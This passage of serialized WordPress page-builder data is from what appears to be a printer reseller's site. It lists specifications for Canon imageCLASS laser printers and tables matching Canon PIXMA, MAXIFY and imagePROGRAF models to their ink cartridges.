]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td 